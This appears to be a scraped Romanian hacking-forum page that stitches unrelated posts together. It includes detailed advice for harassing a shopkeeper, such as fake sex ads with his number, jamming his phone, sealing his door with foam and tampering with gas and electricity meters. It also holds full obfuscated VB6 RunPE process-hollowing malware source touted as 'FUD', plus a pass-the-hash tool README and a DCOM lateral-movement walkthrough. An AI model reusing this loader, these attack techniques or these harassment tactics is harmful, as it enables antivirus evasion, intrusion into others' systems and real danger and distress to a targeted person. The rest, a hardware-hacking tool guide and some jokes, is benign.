Leaderboard

- Gsm jammer. Nu iti mai merg nici tie mobilele nici lui. - Platesti niste boschetari sa stea tot timpul pe acolo pe capul lui. - Cumperi tuica de la piata si aduci niste drojdieri sa stea in cur la el pe scara in fata buticului. - Faci comenzi la sicrie, coroane de morti si tot felul de astea pe adresa lui. - Te caci noaptea la el in fata usii si lasi un postit cu "La multi ani" scris pe el. - Te plimbi prin fata buticului scarpinandu-te la pula in semn de dispret. Daca vine politia, nu are ce-ti face. E ceva normal sa te manance la pula. - Publica-i mosului numarul de telefon pe 400 de comunitati gay impreuna cu descrieri frumoase ca e pasiv, ca presteaza, etc. Poti sa spui ca e curvostina si panarama penala si sa-i publici anuntul pe o gramada de site-uri. - Suna cu numar ascuns diversi GAY de pe forumuri si da-ti intalnire cu ei, in numele lui :))) - Pune-i cacat pe cleanta. - Baga-i scobitori cu super glue in incuietori. - Ce comenzi onoreza ? Daca e ceva de mancare, fa laba pe ele si mergi cu ele la analize, reclama-l peste tot. - Daca serveste ceva la masa. Pune niste tovarasi sa comande ceva si sa puna in mancare fire de par si tot felul de cacaturi si sa sara ca fripti de la mese, sa incepe sa se vaicareasca tare sa auda si ceilalalti clienti.

Pune la vanzare un BMW ieftin din 2013 si lasa-i numarul in anunt. Nici noaptea nu o sa mai doarma.

https://www.udemy.com/ios-10-bootcamp-swift-objective-c-tutorial/?couponCode=IOS10LIMITEDD https://www.udemy.com/kali-linux-hacking/?couponCode=BESTBLACKHAT https://www.udemy.com/the-ethical-hacking-starter-kit-/?couponCode=2000FREE https://www.udemy.com/penetration-testing/?couponCode=WOO052816 https://www.udemy.com/androidcourse/?couponCode=ANDROIDFREE https://www.udemy.com/the-complete-jenkins-course-for-developers-and-devops/?couponCode=FR0002

The Introductory IoT Hardware Hacking Tool Box Aggregated here you will find some of the most popular tools for reverse engineering embedded electronics, as well as some documentation and tutorials on how to get started using them. If you have been interested in hardware hacking and modding, and even developing software exploits there has never been a better time to jump in and learn. Based on the items listed here I will introduce you to some foundational knowledge so that you can start your journey. The general process to hardware hacking follows a few main steps. First you want to pick a target device that interests you. You may want to pick a device with known vulnerabilities to practice on or a high value target. The Exploitee.rs Wiki has a range of IoT devices with known vulnerabilities and directions on how to exploit them. (Check out this UART to root shell on a Wink hub.) High value could mean that it is a popular consumer electronic device or that comprising it could have have a large impact on safety and privacy. Next you will need to gain access to the hardware’s electronics. This is bit more involved since a lot of devices are physically designed to make it difficult to access the embedded electronics. They have hard plastic shells and hidden screws that require uncommon bits to open. Finally using the following hardware tools you will identify debug ports and serial protocol interfaces, dump firmware, and reverse engineer the target device. Hardware These tools will allow you to explore your target device through the hardware’s various serial bus interfaces or allow you to dump the firmware image from the device for reverse engineering the software. The firmware image is a compressed file, containing the operating system and its files, it may contain interesting things like the code to the web interface that most these devices have. You can then run that dumped code and reverse engineer it on an emulator like QEMU. Some of the main serial bus interfaces that the following hardware tools can connect to are JTAG, UART, I2C, and SPI. (Please refer to the links on the previous listed protocols to get in-depth explanations of them from a hardware hacking perspective.) Researching all the serial interfaces and their protocols will help you understand how to effectively use following hardware tools for reverse engineering and exploiting IoT devices. Shikra Purchase Resources: Xipiter’s how to use guide This device is touted as a more stable tool compared to the Bus Pirate. The hardware is very reliable and stable for connecting to UART, JTAG, and SPI. Many people in the Software Exploitation via Hardware Exploitation community really enjoy using this somewhat lesser known device and is used in the SEXviaHEXtraining. If you want to pull the firmware image off a target IoT device for software exploitation then the Shikra is a great tool for the job. Just connect the Shikra to the target device’s SPI chip. You may need an 8-pin SOIC clip to connect the Shikra to the SPI interface. In the how to use guide linked above, it was claimed to have taken the Bus Pirate 30 minutes to dump a 4MB firmware image off a device compared to just under a minute for the Shikra to do the same job. The Shikra may be something less people are familiar with, but it provides consistent, powerful and fast performance for certain jobs. https://en.wikipedia.org/wiki/Bus_Pirate Bus Pirate Purchase Resources: Documentation Forums Dangerous Prototypes’ tutorial This is one of the most widely used tools out there right now. At the time of this blog’s posting the Bus Pirate version 4 official firmware development seems to have been abandoned. This has caused a lot of headaches for users struggling to get features to work on version 4 as well as they did on version 3. For example some people have had difficulties with getting JTAG support to work on version 4. As stated in the documentation link, the version 3 firmware has a strong community effort behind it. As long as there is a strong community backing this tool that community will be committed to fixing and maintaining the firmware of the Bus Pirate. Overall the Bus Pirate is a vey robust tool. Finding someone to help you use it will not be hard, try joining the forums. https://www.parallax.com/product/32115 JTAGulator Purchase Resources: Joe Grand’s video overview of the tool Senrio’s explanation of JTAG Besides looking badass this tool is great for identifying what the the different pinouts and chips do on the target device. When you open up the device it is not going to be obvious what pinouts and chips run which serial protocols. Testing each one with the JTAGulator will help you find your UART, JTAG, SPI, and other serial protocol interfaces. http://hackerwarehouse.com/product/facedancer21/ Facedancer21 Purchase Resources: Travis Goodspeed’s blog GoodFET’s documentation Not every IoT device is going to have a USB port, but this tool can be very useful when one is available. The Facedancer, besides having a cool name, essentially lets your computer become the USB drive plugged into a device. Within this emulation you can communicate to the target device over the USB bus with Python. Devices often trust USB drives plugged into them so exploring the target device from this perspective can be very rewarding. https://www.sparkfun.com/products/8430 Make sure you get all the probes and jumper cables required for connecting the target device to the hacking tool and then back to your computer. Most of these linked articles for these hardware tools show what you will need. The wires and cables will plug onto the pinouts or clip onto different chips. Having a variety of male to male, female to female, and male to female wires is definitely helpful. https://www.seeedstudio.com/Bus-Pirate-v3-probe-Kit-p-526.html Tools It may not be as interesting as the the hardware tools above, but before you can even get to the IoT device’s juicy electronic guts you need to make sure you have the proper tools to gain access to them. If you are feeling cheap then you can always just skip this last section and smash the IoT device open with a rock. Tempting as that might sound you risk damaging the electronics. Many IoT devices use screws that require tools other than Phillips or flathead. You are likely to encounter Torx security, tri-point, gamebit, and spanner screws to name a few. The screws also require 1–4mm bits to unscrew them. https://www.ifixit.com/Store/Tools/64-Bit-Driver-Kit/IF145-299 64 Bit Driver Kit Purchase The 64 Bit Driver Kit is a highly recommended set of bits that should help get you into most electronic devices much better than 32 bit or 16 bit. This set has about 15 types of screw bits with multiple sizes of each. This might be overkill to add to your tool set, but you probably won’t ever have to buy anymore bits after getting this set! If you know what screws your device has then you can find much smaller kits with the specific pieces you need. https://www.ifixit.com/Store/Tools/Jimmy/IF145-259 Jimmy (spudger) Purchase Another great tool for you you to have on hand when trying to pry these devices open is some type of jimmy. Many of these devices will be sealed closed with some sort of snap together plastic. Using a tool like this can help you pull the plastic shells apart and let you gain access to the electronic goodies inside. If you think this is too much of a uni-tasker then you can fashion a similar tool yourself. Even a sturdy guitar pick could work! Source: https://blog.securityevaluators.com/the-introductory-iot-hardware-hacking-tool-box-389c4605329f#.8thh1ho2h

Nu știu câți știți de CAA record, dar merită să aruncați o privire. https://blog.dnsimple.com/2017/01/introducing-caa-records/

https://github.com/Screetsec/TheFatRat

by Karcrack ( modded cobein's RunPE ) Native & Just RtlMoveMemory '--------------------------------------------------------------------------------------- ' Module : cNtPEL ' DateTime : 30/06/2009 06:32 ' Author : Cobein ' Mail : cobein27@hotmail.com ' WebPage : http://www.advancevb.com.ar (updated =D) ' Purpose : Inject Exe ' Usage : At your own risk ' Requirements: None ' Distribution: You can freely use this code in your own ' applications, but you may not reproduce ' or publish this code on any web site, ' online service, or distribute as source ' on any media without express permission. ' ' Thanks to : This is gonna be a looong list xD ' Batfitch - kernel base asm ' Karcrack - For helping me to debug and test it ' Paul Caton - vTable patch examples ' rm_code - First call api prototype ' and different books and pappers ' ' Compile : P-Code !!! ' ' Comments : Coded on top of the invoke module. ' ' History : 30/06/2009 First Cut.................................................... ' 02/08/2009 Modded By Karcrack, Now is NtRunPEL, thanks Slayer (;........ '--------------------------------------------------------------------------------------- Option Explicit Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D& Private Const IMAGE_NT_SIGNATURE As Long = &H4550& Private Const SIZE_DOS_HEADER As Long = &H40 Private Const SIZE_NT_HEADERS As Long = &HF8 Private Const SIZE_EXPORT_DIRECTORY As Long = &H28 Private Const SIZE_IMAGE_SECTION_HEADER As Long = &H28 Private Const THUNK_APICALL As String = "8B4C240851<PATCH1>E8<PATCH2>5989016631C0C3" Private Const THUNK_KERNELBASE As String = "8B5C240854B830000000648B008B400C8B401C8B008B400889035C31C0C3" Private Const PATCH1 As String = "<PATCH1>" Private Const PATCH2 As String = "<PATCH2>" Private Const CONTEXT_FULL As Long = &H10007 Private Const CREATE_SUSPENDED As Long = &H4 Private Const MEM_COMMIT As Long = &H1000 Private Const MEM_RESERVE As Long = &H2000 Private Const PAGE_EXECUTE_READWRITE As Long = &H40 Private Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessID As Long dwThreadID As Long End Type Private Type FLOATING_SAVE_AREA ControlWord As Long StatusWord As Long TagWord As Long ErrorOffset As Long ErrorSelector As Long DataOffset As Long DataSelector As Long RegisterArea(1 To 80) As Byte Cr0NpxState As Long End Type Private Type CONTEXT ContextFlags As Long Dr0 As Long Dr1 As Long Dr2 As Long Dr3 As Long Dr6 As Long Dr7 As Long FloatSave As FLOATING_SAVE_AREA SegGs As Long SegFs As Long SegEs As Long SegDs As Long Edi As Long Esi As Long Ebx As Long Edx As Long Ecx As Long Eax As Long Ebp As Long Eip As Long SegCs As Long EFlags As Long Esp As Long SegSs As Long End Type Private Type IMAGE_DOS_HEADER e_magic As Integer e_cblp As Integer e_cp As Integer e_crlc As Integer e_cparhdr As Integer e_minalloc As Integer e_maxalloc As Integer e_ss As Integer e_sp As Integer e_csum As Integer e_ip As Integer e_cs As Integer e_lfarlc As Integer e_ovno As Integer e_res(0 To 3) As Integer e_oemid As Integer e_oeminfo As Integer e_res2(0 To 9) As Integer e_lfanew As Long End Type Private Type IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols As Long SizeOfOptionalHeader As Integer Characteristics As Integer End Type Private Type IMAGE_DATA_DIRECTORY VirtualAddress As Long Size As Long End Type Private Type IMAGE_OPTIONAL_HEADER Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData As Long ImageBase As Long SectionAlignment As Long FileAlignment As Long MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer W32VersionValue As Long SizeOfImage As Long SizeOfHeaders As Long CheckSum As Long SubSystem As Integer DllCharacteristics As Integer SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes As Long DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY End Type Private Type IMAGE_NT_HEADERS Signature As Long FileHeader As IMAGE_FILE_HEADER OptionalHeader As IMAGE_OPTIONAL_HEADER End Type Private Type IMAGE_EXPORT_DIRECTORY Characteristics As Long TimeDateStamp As Long MajorVersion As Integer MinorVersion As Integer lpName As Long Base As Long NumberOfFunctions As Long NumberOfNames As Long lpAddressOfFunctions As Long lpAddressOfNames As Long lpAddressOfNameOrdinals As Long End Type Private Type IMAGE_SECTION_HEADER SecName As String * 8 VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers As Long NumberOfRelocations As Integer NumberOfLinenumbers As Integer Characteristics As Long End Type Private Declare Sub CpyMem Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long) Private c_lKrnl As Long Private c_lLoadLib As Long Private c_bInit As Boolean Private c_lVTE As Long Private c_lOldVTE As Long Private c_bvASM(&HFF) As Byte Public Function zDoNotCall() As Long 'This function will be replaced with machine code laterz 'Do not add any public procedure on top of it End Function Public Function RunPE(ByRef bvBuff() As Byte, Optional sHost As String, Optional ByRef hProc As Long) As Boolean Dim i As Long Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS Dim tIMAGE_SECTION_HEADER As IMAGE_SECTION_HEADER Dim tSTARTUPINFO As STARTUPINFO Dim tPROCESS_INFORMATION As PROCESS_INFORMATION Dim tCONTEXT As CONTEXT Dim lKernel As Long Dim lNTDll As Long Dim lMod As Long If Not c_bInit Then Exit Function Call CpyMem(tIMAGE_DOS_HEADER, bvBuff(0), SIZE_DOS_HEADER) If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then Exit Function End If Call CpyMem(tIMAGE_NT_HEADERS, bvBuff(tIMAGE_DOS_HEADER.e_lfanew), SIZE_NT_HEADERS) If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then Exit Function End If 'kernel32 lKernel = LoadLibrary(nlfpkgnrj("6B65726E656C3332")) 'KPC 'ntdll lNTDll = LoadLibrary(nlfpkgnrj("6E74646C6C")) 'KPC If sHost = vbNullString Then sHost = Space(260) 'GetModuleFileNameW lMod = GetProcAddress(lKernel, nlfpkgnrj("4765744D6F64756C6546696C654E616D6557")) 'KPC Invoke lMod, App.hInstance, StrPtr(sHost), 260 End If With tIMAGE_NT_HEADERS.OptionalHeader tSTARTUPINFO.cb = Len(tSTARTUPINFO) 'CreateProcessW lMod = GetProcAddress(lKernel, nlfpkgnrj("43726561746550726F6365737357")) 'KPC Invoke lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION) 'NtUnmapViewOfSection lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74556E6D6170566965774F6653656374696F6E")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase 'VirtualAllocEx lMod = GetProcAddress(lKernel, nlfpkgnrj("5669727475616C416C6C6F634578")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE 'NtWriteVirtualMemory lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0 For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1 CpyMem tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER) Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0 Next i tCONTEXT.ContextFlags = CONTEXT_FULL 'NtGetContextThread lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74476574436F6E74657874546872656164")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT) 'NtWriteVirtualMemory lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0 tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint 'NtSetContextThread lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74536574436F6E74657874546872656164")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT) 'NtResumeThread lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74526573756D65546872656164")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hThread, 0 hProc = tPROCESS_INFORMATION.hProcess End With RunPE = True End Function Public Function Invoke(ByVal lMod As Long, ParamArray Params()) As Long Dim lPtr As Long Dim i As Long Dim sData As String Dim sParams As String If lMod = 0 Then Exit Function For i = UBound(Params) To 0 Step -1 sParams = sParams & "68" & GetLong(CLng(Params(i))) Next lPtr = VarPtr(c_bvASM(0)) lPtr = lPtr + (UBound(Params) + 2) * 5 lPtr = lMod - lPtr - 5 sData = THUNK_APICALL sData = Replace(sData, PATCH1, sParams) sData = Replace(sData, PATCH2, GetLong(lPtr)) Call PutThunk(sData) Invoke = PatchCall End Function Private Function GetLong(ByVal lData As Long) As String Dim bvTemp(3) As Byte Dim i As Long CpyMem bvTemp(0), lData, &H4 For i = 0 To 3 GetLong = GetLong & Right("0" & Hex(bvTemp(i)), 2) Next End Function Private Sub PutThunk(ByVal sThunk As String) Dim i As Long For i = 0 To Len(sThunk) - 1 Step 2 c_bvASM((i / 2)) = CByte("&h" & Mid$(sThunk, i + 1, 2)) Next i End Sub Private Function PatchCall() As Long CpyMem c_lVTE, ByVal ObjPtr(Me), &H4 c_lVTE = c_lVTE + &H1C CpyMem c_lOldVTE, ByVal c_lVTE, &H4 CpyMem ByVal c_lVTE, VarPtr(c_bvASM(0)), &H4 PatchCall = zDoNotCall CpyMem ByVal c_lVTE, c_lOldVTE, &H4 End Function Public Function GetMod(ByVal sLib As String, ByVal sProc As String) As Long GetMod = Me.GetProcAddress(Me.LoadLibrary(sLib), sProc) End Function Public Function LoadLibrary(ByVal sLib As String) As Long LoadLibrary = Invoke(c_lLoadLib, StrPtr(sLib & vbNullChar)) End Function Public Property Get Initialized() As Boolean Initialized = c_bInit End Property Public Sub Class_Initialize() Call PutThunk(THUNK_KERNELBASE) c_lKrnl = PatchCall If Not c_lKrnl = 0 Then c_lLoadLib = GetProcAddress(c_lKrnl, "LoadLibraryW") If Not c_lLoadLib = 0 Then c_bInit = True End If End If End Sub Public Function GetProcAddress(ByVal lMod As Long, ByVal sProc As String) As Long Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS Dim tIMAGE_EXPORT_DIRECTORY As IMAGE_EXPORT_DIRECTORY Call CpyMem(tIMAGE_DOS_HEADER, ByVal lMod, SIZE_DOS_HEADER) If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then Exit Function End If Call CpyMem(tIMAGE_NT_HEADERS, ByVal lMod + tIMAGE_DOS_HEADER.e_lfanew, SIZE_NT_HEADERS) If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then Exit Function End If Dim lVAddress As Long Dim lVSize As Long Dim lBase As Long With tIMAGE_NT_HEADERS.OptionalHeader lVAddress = lMod + .DataDirectory(0).VirtualAddress lVSize = lVAddress + .DataDirectory(0).Size lBase = .ImageBase End With Call CpyMem(tIMAGE_EXPORT_DIRECTORY, ByVal lVAddress, SIZE_EXPORT_DIRECTORY) Dim i As Long Dim lFunctAdd As Long Dim lNameAdd As Long Dim lNumbAdd As Long With tIMAGE_EXPORT_DIRECTORY For i = 0 To .NumberOfNames - 1 CpyMem lNameAdd, ByVal lBase + .lpAddressOfNames + i * 4, 4 If StringFromPtr(lBase + lNameAdd) = sProc Then CpyMem lNumbAdd, ByVal lBase + .lpAddressOfNameOrdinals + i * 2, 2 CpyMem lFunctAdd, ByVal lBase + .lpAddressOfFunctions + lNumbAdd * 4, 4 GetProcAddress = lFunctAdd + lBase If GetProcAddress >= lVAddress And _ GetProcAddress <= lVSize Then Call ResolveForward(GetProcAddress, lMod, sProc) If Not lMod = 0 Then GetProcAddress = GetProcAddress(lMod, sProc) Else GetProcAddress = 0 End If End If Exit Function End If Next End With End Function Private Function ResolveForward( _ ByVal lAddress As Long, _ ByRef lLib As Long, _ ByRef sMod As String) Dim sForward As String sForward = StringFromPtr(lAddress) If InStr(1, sForward, ".") Then lLib = LoadLibrary(Split(sForward, ".")(0)) sMod = Split(sForward, ".")(1) End If End Function Private Function StringFromPtr( _ ByVal lAddress As Long) As String Dim bChar As Byte Do CpyMem bChar, ByVal lAddress, 1 lAddress = lAddress + 1 If bChar = 0 Then Exit Do StringFromPtr = StringFromPtr & Chr$(bChar) Loop End Function Private Function nlfpkgnrj(ByVal sData As String) As String Dim i As Long For i = 1 To Len(sData) Step 2 nlfpkgnrj = nlfpkgnrj & Chr$(Val("&H" & Mid$(sData, i, 2))) Next i End Function That modded version uses Native APIs (Thanks Slayer ) and loads APIs on runtime... Of course, its FUD... ALL CREDITS FOR COBEIN!!! BTW, Its a class module (*.cls)

http://www.autosectools.com/process-hollowing.pdf https://cysinfo.com/detecting-deceptive-hollowing-techniques/

ai uitat sa-i spui de Sosoi... http://www.nationalisti.ro/2016/10/sosoiul-cel-mai-protector-animal-impotriva-tiganilor/ ERA SA UIT: BAGA SPUMA POLIURETANICA PE TOATA USA LUI SA NU MAI IASA/INTRE (referitor la ce a zis Tex, nu baga bete de chibrit, baga tot spuma dinaia pe gaura chizdii). Sfat: iti trebuie o teava mai micuta, subtire sa se muleze ... sa intre bine spuma... dai incet .. incet ... ai sa vezi cum vine descarcerarea... eventual pune si un sistem de bruiaj al tel mobile sa nu poata suna... iar in caz ca are fix... e suficient un cleste.... =))) Umbla si la contorul electric, rupe sigiliul, apoi umbla si la ala de gaze...ii rupi si acolo sigiliul .... la cutia postala ii poti face comanda de un piton regal, e maxim 200 ron dar se merita... ajunge le spital iar.. // caz ca are baiat ... lasa un test pozitiv de sarcina insotit de o scrisoare in cutia postala... hai ca ti-am dat idei destule.... CE MONTA A AJUNS ACEST FORUM? THE ANARCHIST COOKBOOK?!?!??!

Ii bagi nr aici pe diferite orase si cu poze cu "bunaciuni" http://sexy-escorte.com/ bafta am experimentat pe niste jegosi ... si au ajuns sa isi schimbe nr de tel ... vezi baga pe orase medii, nu bucuresti .. ca acolo vin f multe anunturi... incerca focsani, ploiesti, buzau, bacau, brasov, iasi, constanta ... exclus bucuresti. L.E.: n-au ce sa-ti faca oamenii pe care ii dai acolo prin militie, ba chair vor rade de ei ce de la politie.... legal nu se poate face nimic, verifica pe avocatnet.ro P.S.: Succes!!!!!!!

This is for someone who wants to jump into kernel debugging but like me thought it was very difficult to get setup and working properly. It turns out its actually a lot easier than you think. part1: https://vvalien1.wordpress.com/2016/12/26/kernel-debugging-101/ part2: https://vvalien1.wordpress.com/2017/01/01/kernel-debugging-101-part2/ part3: https://vvalien1.wordpress.com/2017/01/01/kernel-debugging-101-part3/

LATERAL MOVEMENT USING THE MMC20.APPLICATION COM OBJECT January 5, 2017 by enigma0x3 For those of you who conduct pentests or red team assessments, you are probably aware that there are only so many ways to pivot, or conduct lateral movement to a Windows system. Some of those techniques include psexec, WMI, at, Scheduled Tasks, and WinRM (if enabled). Since there are only a handful of techniques, more mature defenders are likely able to prepare for and detect attackers using them. Due to this, I set out to find an alternate way of pivoting to a remote system. Recently, I have been digging into COM (Component Object Model) internals. My interest in researching new lateral movement techniques led me to DCOM (Distributed Component Object Model), due to the ability to interact with the objects over the network. Microsoft has some good documentation on DCOM here and on COM here. You can find a solid list of DCOM applications using PowerShell, by running “Get-CimInstance Win32_DCOMApplication”. While enumerating the different DCOM applications, I came across the MMC Application Class (MMC20.Application). This COM object allows you to script components of MMC snap-in operations. While enumerating the different methods and properties within this COM object, I noticed that there is a method named “ExecuteShellCommand” under Document.ActiveView. You can read more on that method here. So far, we have a DCOM application that we can access over the network and can execute commands. The final piece is to leverage this DCOM application and the ExecuteShellCommand method to obtain code execution on a remote host. Fortunately, as an admin, you can remotely interact with DCOM with PowerShell by using “[activator]::CreateInstance([type]::GetTypeFromProgID”. All you need to do is provide it a DCOM ProgID and an IP address. It will then provide you back an instance of that COM object remotely: It is then possible to invoke the “ExecuteShellCommand” method to start a process on the remote host: As you can see, calc.exe is running under Matt while the user “Jason” is logged in: By using this DCOM application and the associated method, it is possible to pivot to a remote host without using psexec, WMI, or other well-known techniques. To further demonstrate this, we can use this technique to execute an agent, such as Cobalt Strike’s Beacon, on a remote host. Since this is a lateral movement technique, it requires administrative privileges on the remote host: As you can see, the user “Matt” has local admin rights on “192.168.99.132”. You can then use the ExecuteShellCommand method of MMC20.Application to execute staging code on the remote host. For this example, a simple encoded PowerShell download cradle is specified. Be sure to pay attention to the requirements of “ExecuteShellCommand” as the program and its parameters are separated: The result of executing this through an agent results in obtaining access to the remote target: To detect/mitigate this, defenders can disable DCOM, block RPC traffic between workstations, and look for a child process spawning off of “mmc.exe”. Cheers! Matt N. Sursa: https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

Invoke-TheHash Invoke-TheHash contains PowerShell functions for performing NTLMv2 pass the hash WMI and SMB command execution. WMI and SMB services are accessed through .NET TCPClient connections. Local administrator privilege is not required client-side. Requirements Minimum PowerShell 2.0 Import Import-Module ./Invoke-TheHash.psd1 or . ./Invoke-WMIExec.ps1 . ./Invoke-SMBExec.ps1 . ./Invoke-TheHash.ps1 Functions Invoke-WMIExec Invoke-SMBExec Invoke-TheHash ConvertTo-TargetList Invoke-WMIExec WMI command execution function. Parameters: Target - Hostname or IP address of target. Username - Username to use for authentication. Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. Hash - NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. Command - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. Sleep - Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. Example: Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose Screenshot: Invoke-SMBExec SMB (PsExec) command execution function supporting SMB1, SMB2, and SMB signing. Parameters: Target - Hostname or IP address of target. Username - Username to use for authentication. Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. Hash - NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. Command - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to SCM on the target. CommandCOMSPEC - Default = Enabled: Prepend %COMSPEC% /C to Command. Service - Default = 20 Character Random: Name of the service to create and delete on the target. SMB1 - (Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target. Sleep - Default = 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds. Example: Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose Screenshot: Invoke-TheHash Function for running Invoke-WMIExec and Invoke-SMBExec against multiple targets. Parameters: Type - Sets the desired Invoke-TheHash function. Set to either WMIExec or SMBExec. Targets - List of hostnames, IP addresses, or CIDR notation for targets. TargetsExclude - List of hostnames and/or IP addresses to exclude form the list or targets. PortCheckDisable - (Switch) Disable WMI or SMB port check. Since this function is not yet threaded, the port check serves to speed up he function by checking for an open WMI or SMB port before attempting a full synchronous TCPClient connection. PortCheckTimeout - Default = 100: Set the no response timeout in milliseconds for the WMI or SMB port check. Username - Username to use for authentication. Domain - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. Hash - NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. Command - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI or SCM on the target. CommandCOMSPEC - Default = Enabled: SMBExec type only. Prepend %COMSPEC% /C to Command. Service - Default = 20 Character Random: SMBExec type only. Name of the service to create and delete on the target. SMB1 - (Switch) Force SMB1. SMBExec type only. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target. Sleep - Default = WMI 10 Milliseconds, SMB 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds. Example: Invoke-TheHash -Type WMIExec -Targets 192.168.100.0/24 -TargetsExclude 192.168.100.50 -Username Administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 Screenshot: ConvertTo-TargetList Converts Invoke-TheHash output to an array that contains only targets discovered to have Invoke-WMIExec or Invoke-SMBExec access. The output from this function can be fed back into the Targets parameter of Invoke-TheHash. Sursa: https://github.com/Kevin-Robertson/Invoke-TheHash

Soc si Groaza printre prietenii pentesteri de pe RST. Toata lumea ! #AdevaratS-aNascut

Cerințe: - experiență de o viață în Cozonac++ - experiență vastă a framework-urilor: Pâi.NET, ColacSharp, CozonacNet, Prajituri.JS, Cake.PHP - experiență în configurarea hardware-ului de copt și frământat - să faci față unui volum mare de task-uri - cunoaștere avansată a algoritmilor de coacere - experiență în programarea orientată pe aluat - cunoștințe de programare concentrică a inelelor CSS (cacao, stafide, scorțișoară) în interiorul cozonacilor Constituie un avantaj: - cunoașterea plugin-urilor de Nucă, Rahat, Mac și Stafide - cunoașterea conceptelor de moștenire a rețetelor de la bunica Beneficii: - pupături cu ventuze de la toate neamurile pentru cozonacii de calitate https://www.bestjobs.eu/loc-de-munca/expert-in-programare-orientata-pe-aluat?

Votez B 777 RST pentru VIP/Moderator!

^ Ala are comportament de forum. Tre sa-i facem cont.

=))))

